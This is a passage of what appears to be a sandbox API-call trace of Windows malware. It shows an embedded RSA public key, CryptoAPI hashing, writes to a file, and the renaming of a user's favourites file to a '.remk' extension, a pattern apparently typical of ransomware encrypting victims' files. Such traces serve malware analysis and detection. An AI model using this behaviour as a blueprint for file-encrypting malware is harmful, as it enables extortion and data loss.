KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.881] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0233.883] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.883] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.883] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.883] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.883] GetLastError () returned 0x0 [0233.883] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.883] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0233.883] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.883] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.883] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.883] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.884] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.884] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.884] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.884] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.884] CloseHandle (hObject=0x640) returned 1 [0233.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0233.885] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.remk")) returned 1 [0233.898] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0233.898] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.898] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0233.898] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.903] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.905] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.905] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0233.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0233.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0233.907] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.907] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: 